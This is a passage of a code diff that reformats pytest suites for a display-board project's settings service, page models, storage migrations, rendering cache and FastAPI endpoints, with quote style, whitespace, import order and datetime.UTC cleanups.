+            f.write("{}")
             yield f.name
         os.unlink(f.name)
-    
+
     @pytest.fixture
     def service(self, temp_settings_file):
         """Create a settings service with temp file."""
-        with patch.object(SettingsService, '_load_transition_settings', return_value=TransitionSettings()):
-            with patch.object(SettingsService, '_load_output_settings', return_value=OutputSettings()):
+        with patch.object(SettingsService, "_load_transition_settings", return_value=TransitionSettings()):
+            with patch.object(SettingsService, "_load_output_settings", return_value=OutputSettings()):
                 return SettingsService(settings_file=temp_settings_file)
-    
+
     def test_get_transition_settings(self, service):
         """Test getting transition settings."""
         settings = service.get_transition_settings()
         assert isinstance(settings, TransitionSettings)
-    
+
     def test_update_transition_strategy(self, service):
         """Test updating transition strategy."""
         result = service.update_transition_settings(strategy="column")
         assert result.strategy == "column"
-    
+
     def test_update_transition_invalid_strategy_raises(self, service):
         """Test invalid strategy raises ValueError."""
         with pytest.raises(ValueError, match="Invalid strategy"):
             service.update_transition_settings(strategy="invalid")
-    
+
     def test_update_transition_all_strategies(self, service):
         """Test all valid strategies can be set."""
         for strategy in VALID_STRATEGIES:
             result = service.update_transition_settings(strategy=strategy)
             assert result.strategy == strategy
-    
+
     def test_update_transition_clear_with_none(self, service):
         """Test clearing strategy with None."""
         service.update_transition_settings(strategy="column")
         result = service.update_transition_settings(strategy=None)
         assert result.strategy is None
-    
+
     def test_update_transition_interval_and_step(self, service):
         """Test updating interval and step size."""
-        result = service.update_transition_settings(
-            step_interval_ms=500,
-            step_size=2
-        )
+        result = service.update_transition_settings(step_interval_ms=500, step_size=2)
         assert result.step_interval_ms == 500
         assert result.step_size == 2
-    
+
     def test_get_output_settings(self, service):
         """Test getting output settings."""
         settings = service.get_output_settings()
         assert isinstance(settings, OutputSettings)
-    
+
     def test_set_output_target(self, service):
         """Test setting output target."""
         result = service.set_output_target("both")
         assert result.target == "both"
-    
+
     def test_set_output_invalid_target_raises(self, service):
         """Test invalid target raises ValueError."""
         with pytest.raises(ValueError, match="Invalid target"):
             service.set_output_target("invalid")
-    
+
     def test_all_output_targets(self, service):
         """Test all valid output targets can be set."""
         for target in VALID_OUTPUT_TARGETS:
             result = service.set_output_target(target)
             assert result.target == target
-    
+
     def test_should_send_to_board(self, service):
         """Test should_send_to_board based on output target."""
         service.set_output_target("board")
@@ -149,23 +143,23 @@ class TestSettingsService:
 
         service.set_output_target("ui")
         assert service.should_send_to_board() is False
-    
+
     def test_settings_persistence(self, temp_settings_file):
         """Test that settings persist across service restarts."""
         # First service instance - use real loading which will use defaults
-        with patch.object(SettingsService, '_load_transition_settings', return_value=TransitionSettings()):
-            with patch.object(SettingsService, '_load_output_settings', return_value=OutputSettings()):
+        with patch.object(SettingsService, "_load_transition_settings", return_value=TransitionSettings()):
+            with patch.object(SettingsService, "_load_output_settings", return_value=OutputSettings()):
                 service1 = SettingsService(settings_file=temp_settings_file)
                 service1.update_transition_settings(strategy="diagonal", step_interval_ms=1000)
                 service1.set_output_target("both")
-        
+
         # Second service instance - load from file
         service2 = SettingsService(settings_file=temp_settings_file)
-        
+
         # Should load persisted settings
         transition = service2.get_transition_settings()
         output = service2.get_output_settings()
-        
+
         assert transition.strategy == "diagonal"
         assert transition.step_interval_ms == 1000
         assert output.target == "both"
@@ -173,97 +167,88 @@ class TestSettingsService:
 
 class TestOutputAPIEndpoints:
     """Tests for output-related API endpoints."""
-    
+
     @pytest.fixture
     def client(self):
         """Create a test client."""
-        from src.api_server import app
         from fastapi.testclient import TestClient
+
+        from src.api_server import app
+
         return TestClient(app)
-    
+
     @pytest.fixture
     def mock_services(self):
         """Mock the services."""
-        with patch('src.api_server.get_display_service') as mock_display, \
-             patch('src.api_server.get_settings_service') as mock_settings, \
-             patch('src.api_server.get_service') as mock_main:
-            
+        with (
+            patch("src.api_server.get_display_service") as mock_display,
+            patch("src.api_server.get_settings_service") as mock_settings,
+            patch("src.api_server.get_service") as mock_main,
+        ):
             # Setup display service mock
             mock_display_svc = Mock()
             mock_display.return_value = mock_display_svc
-            
+
             # Setup settings service mock
             mock_settings_svc = Mock()
             mock_settings_svc.get_transition_settings.return_value = TransitionSettings(
-                strategy="column",
-                step_interval_ms=500,
-                step_size=2
+                strategy="column", step_interval_ms=500, step_size=2
             )
             mock_settings_svc.get_output_settings.return_value = OutputSettings(target="board")
             mock_settings_svc.should_send_to_board.return_value = True
             mock_settings.return_value = mock_settings_svc
-            
+
             # Setup main service mock
             mock_main_svc = Mock()
             mock_main_svc.vb_client = Mock()
             mock_main_svc.vb_client.send_text.return_value = (True, True)
             mock_main.return_value = mock_main_svc
-            
-            yield {
-                "display": mock_display_svc,
-                "settings": mock_settings_svc,
-                "main": mock_main_svc
-            }
-    
+
+            yield {"display": mock_display_svc, "settings": mock_settings_svc, "main": mock_main_svc}
+
     def test_get_transition_settings(self, client, mock_services):
         """Test GET /settings/transitions."""
         response = client.get("/settings/transitions")
-        
+
         assert response.status_code == 200
         data = response.json()
         assert data["strategy"] == "column"
         assert data["step_interval_ms"] == 500
         assert data["step_size"] == 2
-    
+
     def test_update_transition_settings(self, client, mock_services):
         """Test PUT /settings/transitions."""
         mock_services["settings"].update_transition_settings.return_value = TransitionSettings(
-            strategy="row",
-            step_interval_ms=1000,
-            step_size=3
+            strategy="row", step_interval_ms=1000, step_size=3
         )
-        
-        response = client.put(
-            "/settings/transitions",
-            json={"strategy": "row", "step_interval_ms": 1000}
-        )
-        
+
+        response = client.put("/settings/transitions", json={"strategy": "row", "step_interval_ms": 1000})
+
         assert response.status_code == 200
         data = response.json()
         assert data["status"] == "success"
-    
+
     def test_get_output_settings(self, client, mock_services):
         """Test GET /settings/output."""
         response = client.get("/settings/output")
-        
+
         assert response.status_code == 200
         data = response.json()
         assert data["target"] == "board"
         assert "available_targets" in data
-    
+
     def test_update_output_settings(self, client, mock_services):
         """Test PUT /settings/output."""
         mock_services["settings"].set_output_target.return_value = OutputSettings(target="both")
-        
+
         response = client.put("/settings/output", json={"target": "both"})
-        
+
         assert response.status_code == 200
         data = response.json()
         assert data["status"] == "success"
-    
+
     def test_update_output_missing_target(self, client, mock_services):
         """Test PUT /settings/output without target."""
         response = client.put("/settings/output", json={})
-        
-        assert response.status_code == 400
 
+        assert response.status_code == 400

--- a/tests/test_pages.py
+++ b/tests/test_pages.py
@@ -273,7 +273,7 @@ class TestExtractAlignmentFromLine:
         assert content == "Hello"
 
     def test_center(self):
-        align, wrap, content = _extract_alignment_from_line("{center}Hello")
+        align, _wrap, content = _extract_alignment_from_line("{center}Hello")
         assert align == "center"
         assert content == "Hello"
 
@@ -290,7 +290,7 @@ class TestExtractAlignmentFromLine:
         assert content == "Hello"
 
     def test_case_insensitive(self):
-        align, wrap, content = _extract_alignment_from_line("{CENTER}Hello")
+        align, _wrap, content = _extract_alignment_from_line("{CENTER}Hello")
         assert align == "center"
         assert content == "Hello"
 

--- a/tests/test_pages.py
+++ b/tests/test_pages.py
@@ -1,13 +1,16 @@
 """Tests for pages module (models, storage, service, API)."""
 
 import json
-import pytest
-import tempfile
 import os
-from datetime import datetime, timezone
+import tempfile
+from datetime import UTC, datetime
 from unittest.mock import Mock, patch
 
+import pytest
+
+from src.displays.service import DisplayResult
 from src.pages.models import LineMetadata, Page, PageCreate, PageUpdate, RowConfig
+from src.pages.service import DeleteResult, PageService
 from src.pages.storage import (
     CURRENT_SCHEMA_VERSION,
     PageStorage,
@@ -16,30 +19,24 @@ from src.pages.storage import (
     _migrate_v2_to_v3,
     _rewrite_plugin_id_references,
 )
-from src.pages.service import PageService, DeleteResult
-from src.displays.service import DisplayResult
 
 
 class TestPageModels:
     """Tests for Page and related models."""
-    
+
     def test_page_single_valid(self):
         """Test valid single-type page."""
-        page = Page(
-            name="Weather Page",
-            type="single",
-            display_type="weather"
-        )
+        page = Page(name="Weather Page", type="single", display_type="weather")
         assert page.is_valid()
         assert page.type == "single"
         assert page.display_type == "weather"
-    
+
     def test_page_single_missing_display_type(self):
         """Test single page without display_type is invalid."""
         page = Page(name="Bad Page", type="single")
         errors = page.validate_config()
         assert "display_type" in errors[0].lower()
-    
+
     def test_page_composite_valid(self):
         """Test valid composite page."""
         page = Page(
@@ -48,16 +45,16 @@ class TestPageModels:
             rows=[
                 RowConfig(source="weather", row_index=0, target_row=0),
                 RowConfig(source="datetime", row_index=0, target_row=1),
-            ]
+            ],
         )
         assert page.is_valid()
-    
+
     def test_page_composite_missing_rows(self):
         """Test composite page without rows is invalid."""
         page = Page(name="Bad Page", type="composite")
         errors = page.validate_config()
         assert "row" in errors[0].lower()
-    
+
     def test_page_composite_duplicate_targets(self):
         """Test composite page with duplicate target rows is invalid."""
         page = Page(
@@ -66,37 +63,33 @@ class TestPageModels:
             rows=[
                 RowConfig(source="weather", row_index=0, target_row=0),
                 RowConfig(source="datetime", row_index=0, target_row=0),  # Duplicate!
-            ]
+            ],
         )
         errors = page.validate_config()
         assert "duplicate" in errors[0].lower()
-    
+
     def test_page_template_valid(self):
         """Test valid template page."""
-        page = Page(
-            name="Template Page",
-            type="template",
-            template=["Line 1", "Line 2", "", "", "", ""]
-        )
+        page = Page(name="Template Page", type="template", template=["Line 1", "Line 2", "", "", "", ""])
         assert page.is_valid()
-    
+
     def test_page_template_missing_template(self):
         """Test template page without template is invalid."""
         page = Page(name="Bad Page", type="template")
         errors = page.validate_config()
         assert "template" in errors[0].lower()
-    
+
     def test_page_generates_id(self):
         """Test that page auto-generates an ID."""
         page = Page(name="Test", type="single", display_type="weather")
         assert page.id is not None
         assert len(page.id) > 0
-    
+
     def test_page_duration_defaults(self):
         """Test default duration is 300 seconds."""
         page = Page(name="Test", type="single", display_type="weather")
         assert page.duration_seconds == 300
-    
+
     def test_row_config_valid(self):
         """Test valid row config."""
         config = RowConfig(source="weather", row_index=0, target_row=5)
@@ -107,61 +100,61 @@ class TestPageModels:
 
 class TestPageStorage:
     """Tests for PageStorage."""
-    
+
     @pytest.fixture
     def temp_storage_file(self):
         """Create a temporary storage file."""
-        with tempfile.NamedTemporaryFile(mode='w', suffix='.json', delete=False) as f:
+        with tempfile.NamedTemporaryFile(mode="w", suffix=".json", delete=False) as f:
             f.write('{"pages": []}')
             yield f.name
         os.unlink(f.name)
-    
+
     @pytest.fixture
     def storage(self, temp_storage_file):
         """Create a storage instance with temp file."""
         return PageStorage(storage_file=temp_storage_file)
-    
+
     def test_create_page(self, storage):
         """Test creating a page."""
         page = Page(name="Test", type="single", display_type="weather")
         created = storage.create(page)
-        
+
         assert created.id == page.id
         assert created.name == "Test"
         assert storage.count() == 1
-    
+
     def test_create_duplicate_id_raises(self, storage):
         """Test creating page with duplicate ID raises."""
         page = Page(name="Test", type="single", display_type="weather")
         storage.create(page)
-        
+
         with pytest.raises(ValueError, match="already exists"):
             storage.create(page)
-    
+
     def test_get_page(self, storage):
         """Test getting a page by ID."""
         page = Page(name="Test", type="single", display_type="weather")
         storage.create(page)
-        
+
         retrieved = storage.get(page.id)
         assert retrieved is not None
         assert retrieved.name == "Test"
-    
+
     def test_get_nonexistent_returns_none(self, storage):
         """Test getting nonexistent page returns None."""
         result = storage.get("nonexistent")
         assert result is None
-    
+
     def test_list_all(self, storage):
         """Test listing all pages."""
         page1 = Page(name="Page 1", type="single", display_type="weather")
         page2 = Page(name="Page 2", type="single", display_type="datetime")
         storage.create(page1)
         storage.create(page2)
-        
+
         pages = storage.list_all()
         assert len(pages) == 2
-    
+
     def test_list_all_alphabetical_order(self, storage):
         """Test that list_all returns pages sorted alphabetically by name."""
         page_z = Page(name="Zebra Page", type="single", display_type="weather")
@@ -170,11 +163,11 @@ class TestPageStorage:
         storage.create(page_z)
         storage.create(page_a)
         storage.create(page_m)
-        
+
         pages = storage.list_all()
         names = [p.name for p in pages]
         assert names == ["Alpha Page", "Middle Page", "Zebra Page"]
-    
+
     def test_list_all_alphabetical_case_insensitive(self, storage):
         """Test that list_all sorts case-insensitively."""
         page_upper = Page(name="Bravo", type="single", display_type="weather")
@@ -183,50 +176,50 @@ class TestPageStorage:
         storage.create(page_upper)
         storage.create(page_lower)
         storage.create(page_mixed)
-        
+
         pages = storage.list_all()
         names = [p.name for p in pages]
         assert names == ["alpha", "Bravo", "Charlie"]
-    
+
     def test_update_page(self, storage):
         """Test updating a page."""
         page = Page(name="Original", type="single", display_type="weather")
         storage.create(page)
-        
+
         updated = storage.update(page.id, {"name": "Updated"})
         assert updated.name == "Updated"
         assert updated.updated_at is not None
-    
+
     def test_update_nonexistent_returns_none(self, storage):
         """Test updating nonexistent page returns None."""
         result = storage.update("nonexistent", {"name": "Test"})
         assert result is None
-    
+
     def test_delete_page(self, storage):
         """Test deleting a page."""
         page = Page(name="Test", type="single", display_type="weather")
         storage.create(page)
-        
+
         result = storage.delete(page.id)
         assert result is True
         assert storage.get(page.id) is None
-    
+
     def test_delete_nonexistent_returns_false(self, storage):
         """Test deleting nonexistent page returns False."""
         result = storage.delete("nonexistent")
         assert result is False
-    
+
     def test_persistence(self, temp_storage_file):
         """Test that pages persist across storage instances."""
         # Create first storage and add page
         storage1 = PageStorage(storage_file=temp_storage_file)
         page = Page(name="Persistent", type="single", display_type="weather")
         storage1.create(page)
-        
+
         # Create second storage and verify page exists
         storage2 = PageStorage(storage_file=temp_storage_file)
         retrieved = storage2.get(page.id)
-        
+
         assert retrieved is not None
         assert retrieved.name == "Persistent"
 
@@ -388,7 +381,7 @@ class TestSchemaVersioning:
                                 "",
                             ],
                             "duration_seconds": 300,
-                            "created_at": datetime.now(timezone.utc).isoformat(),
+                            "created_at": datetime.now(UTC).isoformat(),
                         }
                     ]
                 },
@@ -423,7 +416,7 @@ class TestSchemaVersioning:
                             "device_type": "flagship",
                             "template": ["{right}ABC", "", "", "", "", ""],
                             "duration_seconds": 300,
-                            "created_at": datetime.now(timezone.utc).isoformat(),
+                            "created_at": datetime.now(UTC).isoformat(),
                         }
                     ]
                 },
@@ -456,7 +449,7 @@ class TestSchemaVersioning:
                                 {"alignment": "left", "wrap": False},
                             ],
                             "duration_seconds": 300,
-                            "created_at": datetime.now(timezone.utc).isoformat(),
+                            "created_at": datetime.now(UTC).isoformat(),
                         }
                     ],
                 },
@@ -588,9 +581,7 @@ class TestMigrateV2ToV3:
         assert count == 0
 
     def test_rewrite_helper_returns_count(self):
-        out, n = _rewrite_plugin_id_references(
-            "{{baywheels.x}} and {{baywheels.y}} but not {{weather.t}}"
-        )
+        out, n = _rewrite_plugin_id_references("{{baywheels.x}} and {{baywheels.y}} but not {{weather.t}}")
         assert n == 2
         assert out == "{{lyft_bike_share.x}} and {{lyft_bike_share.y}} but not {{weather.t}}"
 
@@ -605,6 +596,7 @@ class TestPageStorageV2ToV3Integration:
     @pytest.fixture
     def temp_storage_file(self):
         import glob
+
         with tempfile.NamedTemporaryFile(mode="w", suffix=".json", delete=False) as f:
             yield f.name
         os.unlink(f.name)
@@ -633,12 +625,10 @@ class TestPageStorageV2ToV3Integration:
                                 "",
                                 "",
                             ],
-                            "line_metadata": [
-                                {"alignment": "center", "wrap": False}
-                            ] * 6,
+                            "line_metadata": [{"alignment": "center", "wrap": False}] * 6,
                             "duration_seconds": 300,
                             "demo_plugin_id": None,
-                            "created_at": datetime.now(timezone.utc).isoformat(),
+                            "created_at": datetime.now(UTC).isoformat(),
                         }
                     ],
                 },
@@ -658,50 +648,50 @@ class TestPageStorageV2ToV3Integration:
 
 class TestPageService:
     """Tests for PageService."""
-    
+
     @pytest.fixture
     def temp_storage_file(self):
         """Create a temporary storage file."""
-        with tempfile.NamedTemporaryFile(mode='w', suffix='.json', delete=False) as f:
+        with tempfile.NamedTemporaryFile(mode="w", suffix=".json", delete=False) as f:
             f.write('{"pages": []}')
             yield f.name
         os.unlink(f.name)
-    
+
     @pytest.fixture
     def service(self, temp_storage_file):
         """Create a page service with temp storage."""
         storage = PageStorage(storage_file=temp_storage_file)
         return PageService(storage=storage)
-    
+
     def test_create_page(self, service):
         """Test creating a page via service."""
         data = PageCreate(name="Test", type="single", display_type="weather")
         page = service.create_page(data)
-        
+
         assert page.name == "Test"
         assert page.type == "single"
-    
+
     def test_list_pages(self, service):
         """Test listing pages via service."""
         service.create_page(PageCreate(name="Page 1", type="single", display_type="weather"))
         service.create_page(PageCreate(name="Page 2", type="single", display_type="datetime"))
-        
+
         pages = service.list_pages()
         assert len(pages) == 2
-    
+
     def test_update_page(self, service):
         """Test updating a page via service."""
         page = service.create_page(PageCreate(name="Original", type="single", display_type="weather"))
-        
+
         updated = service.update_page(page.id, PageUpdate(name="Updated"))
         assert updated.name == "Updated"
-    
+
     def test_delete_page(self, service):
         """Test deleting a page via service (when multiple pages exist)."""
         # Create two pages so we're not deleting the last one
         page1 = service.create_page(PageCreate(name="Page 1", type="single", display_type="weather"))
         page2 = service.create_page(PageCreate(name="Page 2", type="single", display_type="datetime"))
-        
+
         result = service.delete_page(page1.id)
         assert result.deleted is True
         assert result.default_page_created is False
@@ -709,268 +699,247 @@ class TestPageService:
         assert service.get_page(page1.id) is None
         # page2 should still exist
         assert service.get_page(page2.id) is not None
-    
+
     def test_delete_last_page_creates_default(self, service):
         """Test deleting the last page creates a default welcome page."""
         # Create a single page
         page = service.create_page(PageCreate(name="Only Page", type="single", display_type="weather"))
-        
+
         # Delete it - should create a default page
         result = service.delete_page(page.id)
-        
+
         assert result.deleted is True
         assert result.default_page_created is True
         assert result.new_page_id is not None
-        
+
         # Original page should be gone
         assert service.get_page(page.id) is None
-        
+
         # Default page should exist
         default_page = service.get_page(result.new_page_id)
         assert default_page is not None
         assert default_page.name == "Welcome"
         assert default_page.type == "template"
         assert default_page.template is not None
-        
+
         # There should be exactly 1 page
         pages = service.list_pages()
         assert len(pages) == 1
-    
+
     def test_delete_nonexistent_page(self, service):
         """Test deleting a page that doesn't exist."""
         result = service.delete_page("nonexistent-id")
         assert result.deleted is False
         assert result.default_page_created is False
-    
-    @patch('src.pages.service.get_display_service')
+
+    @patch("src.pages.service.get_display_service")
     def test_render_single_page(self, mock_get_display, service):
         """Test rendering a single-source page."""
         mock_display_service = Mock()
         mock_display_service.get_display.return_value = DisplayResult(
-            display_type="weather",
-            formatted="Sunny, 72F\nSan Francisco",
-            raw={"temp": 72},
-            available=True
+            display_type="weather", formatted="Sunny, 72F\nSan Francisco", raw={"temp": 72}, available=True
         )
         mock_get_display.return_value = mock_display_service
-        
+
         page = service.create_page(PageCreate(name="Weather", type="single", display_type="weather"))
         result = service.render_page(page)
-        
+
         assert result.available is True
         assert "Sunny" in result.formatted
-    
-    @patch('src.pages.service.get_display_service')
+
+    @patch("src.pages.service.get_display_service")
     def test_render_composite_page(self, mock_get_display, service):
         """Test rendering a composite page."""
         mock_display_service = Mock()
-        
+
         def mock_get_display_fn(display_type):
             if display_type == "weather":
                 return DisplayResult(
-                    display_type="weather",
-                    formatted="Sunny Line 1\nSunny Line 2",
-                    raw={},
-                    available=True
+                    display_type="weather", formatted="Sunny Line 1\nSunny Line 2", raw={}, available=True
                 )
-            elif display_type == "datetime":
+            if display_type == "datetime":
                 return DisplayResult(
-                    display_type="datetime",
-                    formatted="Monday Dec 25\n10:30 AM",
-                    raw={},
-                    available=True
+                    display_type="datetime", formatted="Monday Dec 25\n10:30 AM", raw={}, available=True
                 )
             return DisplayResult(display_type=display_type, formatted="", raw={}, available=False)
-        
+
         mock_display_service.get_display.side_effect = mock_get_display_fn
         mock_get_display.return_value = mock_display_service
-        
-        page = service.create_page(PageCreate(
-            name="Composite",
-            type="composite",
-            rows=[
-                RowConfig(source="weather", row_index=0, target_row=0),
-                RowConfig(source="datetime", row_index=0, target_row=2),
-            ]
-        ))
+
+        page = service.create_page(
+            PageCreate(
+                name="Composite",
+                type="composite",
+                rows=[
+                    RowConfig(source="weather", row_index=0, target_row=0),
+                    RowConfig(source="datetime", row_index=0, target_row=2),
+                ],
+            )
+        )
         result = service.render_page(page)
-        
+
         assert result.available is True
-        lines = result.formatted.split('\n')
+        lines = result.formatted.split("\n")
         assert "Sunny" in lines[0]
         assert "Monday" in lines[2]
-    
+
     def test_render_template_page(self, service):
         """Test rendering a template page."""
-        page = service.create_page(PageCreate(
-            name="Template",
-            type="template",
-            template=["Hello World", "Line 2", "", "", "", ""]
-        ))
+        page = service.create_page(
+            PageCreate(name="Template", type="template", template=["Hello World", "Line 2", "", "", "", ""])
+        )
         result = service.render_page(page)
-        
+
         assert result.available is True
         assert "Hello World" in result.formatted
-    
-    @patch('src.pages.service.get_display_service')
+
+    @patch("src.pages.service.get_display_service")
     def test_preview_page_uses_cache(self, mock_get_display, service):
         """Test that preview_page uses cache on subsequent calls."""
         mock_display_service = Mock()
         mock_display_service.get_display.return_value = DisplayResult(
-            display_type="weather",
-            formatted="Sunny, 72F",
-            raw={"temp": 72},
-            available=True
+            display_type="weather", formatted="Sunny, 72F", raw={"temp": 72}, available=True
         )
         mock_get_display.return_value = mock_display_service
-        
+
         page = service.create_page(PageCreate(name="Weather", type="single", display_type="weather"))
-        
+
         # First call should render
         result1 = service.preview_page(page.id)
         assert result1.available is True
         assert mock_display_service.get_display.call_count == 1
-        
+
         # Second call should use cache (no additional render)
         result2 = service.preview_page(page.id)
         assert result2.available is True
         assert result2.formatted == result1.formatted
         assert mock_display_service.get_display.call_count == 1  # Still 1!
-    
-    @patch('src.pages.service.get_display_service')
+
+    @patch("src.pages.service.get_display_service")
     def test_preview_page_force_refresh(self, mock_get_display, service):
         """Test that force_refresh bypasses cache."""
         mock_display_service = Mock()
         mock_display_service.get_display.return_value = DisplayResult(
-            display_type="weather",
-            formatted="Sunny, 72F",
-            raw={"temp": 72},
-            available=True
+            display_type="weather", formatted="Sunny, 72F", raw={"temp": 72}, available=True
         )
         mock_get_display.return_value = mock_display_service
-        
+
         page = service.create_page(PageCreate(name="Weather", type="single", display_type="weather"))
-        
+
         # First call
         result1 = service.preview_page(page.id)
         assert result1.available is True
         assert mock_display_service.get_display.call_count == 1
-        
+
         # Second call with force_refresh=True should render again
         result2 = service.preview_page(page.id, force_refresh=True)
         assert result2.available is True
         assert mock_display_service.get_display.call_count == 2  # Rendered again!
-    
-    @patch('src.pages.service.get_display_service')
+
+    @patch("src.pages.service.get_display_service")
     def test_update_page_invalidates_cache(self, mock_get_display, service):
         """Test that updating a page invalidates its cache."""
         mock_display_service = Mock()
         mock_display_service.get_display.return_value = DisplayResult(
-            display_type="weather",
-            formatted="Sunny, 72F",
-            raw={"temp": 72},
-            available=True
+            display_type="weather", formatted="Sunny, 72F", raw={"temp": 72}, available=True
         )
         mock_get_display.return_value = mock_display_service
-        
+
         page = service.create_page(PageCreate(name="Weather", type="single", display_type="weather"))
-        
+
         # First preview - should cache
-        result1 = service.preview_page(page.id)
+        service.preview_page(page.id)
         assert mock_display_service.get_display.call_count == 1
-        
+
         # Second preview - should use cache
-        result2 = service.preview_page(page.id)
+        service.preview_page(page.id)
         assert mock_display_service.get_display.call_count == 1
-        
+
         # Update the page
         service.update_page(page.id, PageUpdate(name="Updated Weather"))
-        
+
         # Third preview - should re-render (cache was invalidated)
-        result3 = service.preview_page(page.id)
+        service.preview_page(page.id)
         assert mock_display_service.get_display.call_count == 2
-    
+
     def test_get_cache_stats(self, service):
         """Test getting cache statistics."""
         stats = service.get_cache_stats()
-        
+
         assert "cache_size" in stats
         assert "cached_pages" in stats
         assert "ttl_seconds" in stats
         assert stats["cache_size"] == 0
         assert stats["cached_pages"] == []
-    
-    @patch('src.pages.service.get_display_service')
+
+    @patch("src.pages.service.get_display_service")
     def test_cache_stats_after_preview(self, mock_get_display, service):
         """Test cache statistics after previewing pages."""
         mock_display_service = Mock()
         mock_display_service.get_display.return_value = DisplayResult(
-            display_type="weather",
-            formatted="Sunny, 72F",
-            raw={"temp": 72},
-            available=True
+            display_type="weather", formatted="Sunny, 72F", raw={"temp": 72}, available=True
         )
         mock_get_display.return_value = mock_display_service
-        
+
         page1 = service.create_page(PageCreate(name="Weather", type="single", display_type="weather"))
         page2 = service.create_page(PageCreate(name="Datetime", type="single", display_type="datetime"))
-        
+
         # Preview both pages
         service.preview_page(page1.id)
         service.preview_page(page2.id)
-        
+
         stats = service.get_cache_stats()
         assert stats["cache_size"] == 2
         assert page1.id in stats["cached_pages"]
         assert page2.id in stats["cached_pages"]
-    
-    @patch('src.pages.service.get_template_engine')
+
+    @patch("src.pages.service.get_template_engine")
     def test_preview_pages_batch_shares_context(self, mock_get_engine, service):
         """Test that batch preview builds template context only once."""
         mock_engine = Mock()
         mock_engine._build_context.return_value = {"weather": {"temp": 72}}
         mock_engine.render_lines.return_value = "Hello World\n\n\n\n\n"
         mock_get_engine.return_value = mock_engine
-        
+
         # Create multiple template pages
         page1 = service.create_page(PageCreate(name="Page 1", type="template", template=["Hello", "", "", "", "", ""]))
         page2 = service.create_page(PageCreate(name="Page 2", type="template", template=["World", "", "", "", "", ""]))
         page3 = service.create_page(PageCreate(name="Page 3", type="template", template=["Test", "", "", "", "", ""]))
-        
+
         # Batch preview all three
         results = service.preview_pages_batch([page1.id, page2.id, page3.id])
-        
+
         assert len(results) == 3
         assert all(r is not None and r.available for r in results.values())
-        
+
         # Context should be built only once, not three times
         assert mock_engine._build_context.call_count == 1
         # But render_lines should be called three times (once per page)
         assert mock_engine.render_lines.call_count == 3
-    
-    @patch('src.pages.service.get_template_engine')
+
+    @patch("src.pages.service.get_template_engine")
     def test_preview_pages_batch_uses_cache(self, mock_get_engine, service):
         """Test that batch preview uses cache for already-cached pages."""
         mock_engine = Mock()
         mock_engine._build_context.return_value = {}
         mock_engine.render_lines.return_value = "Rendered\n\n\n\n\n"
         mock_get_engine.return_value = mock_engine
-        
+
         page1 = service.create_page(PageCreate(name="Page 1", type="template", template=["Hello", "", "", "", "", ""]))
         page2 = service.create_page(PageCreate(name="Page 2", type="template", template=["World", "", "", "", "", ""]))
-        
+
         # Preview page1 first to populate cache
         service.preview_pages_batch([page1.id])
         assert mock_engine.render_lines.call_count == 1
-        
+
         # Batch preview both - page1 should use cache, only page2 renders
         mock_engine.render_lines.reset_mock()
         mock_engine._build_context.reset_mock()
         results = service.preview_pages_batch([page1.id, page2.id])
-        
+
         assert len(results) == 2
         assert mock_engine.render_lines.call_count == 1  # Only page2 rendered
-    
+
     def test_preview_pages_batch_nonexistent_page(self, service):
         """Test that batch preview handles nonexistent pages."""
         results = service.preview_pages_batch(["nonexistent-id"])
@@ -979,146 +948,130 @@ class TestPageService:
 
 class TestPagesAPIEndpoints:
     """Tests for pages API endpoints."""
-    
+
     @pytest.fixture
     def client(self):
         """Create a test client."""
-        from src.api_server import app
         from fastapi.testclient import TestClient
+
+        from src.api_server import app
+
         return TestClient(app)
-    
+
     @pytest.fixture
     def mock_page_service(self):
         """Mock the page service."""
-        with patch('src.api_server.get_page_service') as mock:
+        with patch("src.api_server.get_page_service") as mock:
             mock_service = Mock()
             mock.return_value = mock_service
             yield mock_service
-    
+
     def test_list_pages(self, client, mock_page_service):
         """Test GET /pages."""
         mock_page_service.list_pages.return_value = [
             Page(id="1", name="Page 1", type="single", display_type="weather"),
             Page(id="2", name="Page 2", type="single", display_type="datetime"),
         ]
-        
+
         response = client.get("/pages")
-        
+
         assert response.status_code == 200
         data = response.json()
         assert data["total"] == 2
         assert len(data["pages"]) == 2
-    
+
     def test_create_page(self, client, mock_page_service):
         """Test POST /pages."""
         mock_page_service.create_page.return_value = Page(
-            id="new-id",
-            name="New Page",
-            type="single",
-            display_type="weather"
+            id="new-id", name="New Page", type="single", display_type="weather"
         )
-        
-        response = client.post("/pages", json={
-            "name": "New Page",
-            "type": "single",
-            "display_type": "weather"
-        })
-        
+
+        response = client.post("/pages", json={"name": "New Page", "type": "single", "display_type": "weather"})
+
         assert response.status_code == 200
         data = response.json()
         assert data["status"] == "success"
         assert data["page"]["name"] == "New Page"
-    
+
     def test_get_page(self, client, mock_page_service):
         """Test GET /pages/{id}."""
         mock_page_service.get_page.return_value = Page(
-            id="test-id",
-            name="Test Page",
-            type="single",
-            display_type="weather"
+            id="test-id", name="Test Page", type="single", display_type="weather"
         )
-        
+
         response = client.get("/pages/test-id")
-        
+
         assert response.status_code == 200
         data = response.json()
         assert data["name"] == "Test Page"
-    
+
     def test_get_page_not_found(self, client, mock_page_service):
         """Test GET /pages/{id} with nonexistent ID."""
         mock_page_service.get_page.return_value = None
-        
+
         response = client.get("/pages/nonexistent")
-        
+
         assert response.status_code == 404
-    
+
     def test_update_page(self, client, mock_page_service):
         """Test PUT /pages/{id}."""
         mock_page_service.update_page.return_value = Page(
-            id="test-id",
-            name="Updated Page",
-            type="single",
-            display_type="weather"
+            id="test-id", name="Updated Page", type="single", display_type="weather"
         )
-        
+
         response = client.put("/pages/test-id", json={"name": "Updated Page"})
-        
+
         assert response.status_code == 200
         data = response.json()
         assert data["page"]["name"] == "Updated Page"
-    
+
     def test_delete_page(self, client, mock_page_service):
         """Test DELETE /pages/{id}."""
         mock_page_service.delete_page.return_value = DeleteResult(deleted=True)
-        
+
         response = client.delete("/pages/test-id")
-        
+
         assert response.status_code == 200
         data = response.json()
         assert "deleted" in data["message"]
         assert data["default_page_created"] is False
-    
+
     def test_delete_last_page_creates_default(self, client, mock_page_service):
         """Test DELETE /pages/{id} when it's the last page."""
         mock_page_service.delete_page.return_value = DeleteResult(
-            deleted=True,
-            default_page_created=True,
-            new_page_id="new-default-id"
+            deleted=True, default_page_created=True, new_page_id="new-default-id"
         )
-        
+
         response = client.delete("/pages/test-id")
-        
+
         assert response.status_code == 200
         data = response.json()
         assert data["default_page_created"] is True
         assert data["new_page_id"] == "new-default-id"
         assert "welcome" in data["message"].lower()
-    
+
     def test_delete_page_not_found(self, client, mock_page_service):
         """Test DELETE /pages/{id} with nonexistent ID."""
         mock_page_service.delete_page.return_value = DeleteResult(deleted=False)
-        
+
